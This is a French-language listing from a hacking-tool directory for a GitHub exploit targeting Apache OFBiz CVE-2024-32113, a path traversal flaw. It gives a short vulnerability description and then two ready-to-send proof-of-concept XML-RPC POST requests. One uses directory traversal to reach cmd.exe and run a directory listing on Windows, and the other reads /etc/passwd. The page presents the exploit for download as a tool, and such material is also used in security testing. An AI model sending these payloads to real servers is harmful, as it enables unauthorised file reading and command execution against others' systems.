Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Apache-OFBiz-Directory-Traversal-exploit — Exploit pour la vulnérabilité de traversée de chemin Apache OFBiz CVE-2024-32113 via des requêtes XML-RPC forgées, permettant la lecture arbitraire de fichiers et l'exécution potentielle de commandes sur les serveurs vulnérables. | Kitploit
Outils/GitHubGitHub/absholi7ly/apache-ofbiz-directory-traversal-exploit
Analyse des VulnérabilitésExploitationExploitation d'Applications WebExfiltration de DonnéesSécurité WebTests d'Intrusion
GitHubabsholi7ly/apache-ofbiz-directory-traversal-exploit

Apache-OFBiz-Directory-Traversal-exploit

Exploit pour la vulnérabilité de traversée de chemin Apache OFBiz CVE-2024-32113 via des requêtes XML-RPC forgées, permettant la lecture arbitraire de fichiers et l'exécution potentielle de commandes sur les serveurs vulnérables.

Voir le dépôt
1634il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Apache-OFBiz-Directory-Traversal-exploit

Une vulnérabilité classée comme critique a été trouvée dans Apache OFBiz jusqu'à la version 18.12.12. Cette faille affecte une fonctionnalité inconnue. La manipulation d'une entrée inconnue conduit à une vulnérabilité de traversée de chemin. Le produit utilise une entrée externe pour construire un chemin d'accès destiné à identifier un fichier ou un répertoire situé sous un répertoire parent restreint, mais le produit ne neutralise pas correctement les éléments spéciaux dans le chemin qui peuvent amener le chemin à résoudre vers un emplacement en dehors du répertoire restreint. Sont impactés la confidentialité, l'intégrité et la disponibilité.

Introduction

  • La vulnérabilité CVE-2024-32113 permet l'exécution de code arbitraire sur un serveur Apache OFBiz en envoyant une requête HTTP spécialement conçue.
  • Dans cette requête, l'attaquant utilise le paramètre ../../../../../../etc/passwd pour pointer vers le fichier etc/passwd sur le serveur Apache OFBiz.
  • Lorsque le serveur Apache OFBiz traite cette requête, il tentera de lire le fichier etc/passwd, qui contient des informations sensibles sur les utilisateurs du serveur.
  • Ces informations peuvent être utilisées pour mener d'autres attaques contre le serveur, telles que le vol de données, leur modification, voire leur suppression.

Poc

1-

root@kitploit:~
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>performCommand</methodName>
  <params>
    <param>
      <value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
    </param>
  </params>
</methodCall>

OU

2-

root@kitploit:~
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>example.createBlogPost</methodName>
  <params>
    <param>
      <value><string>../../../../../../etc/passwd</string></value>
    </param>
  </params>
</methodCall>
Télécharger l’outil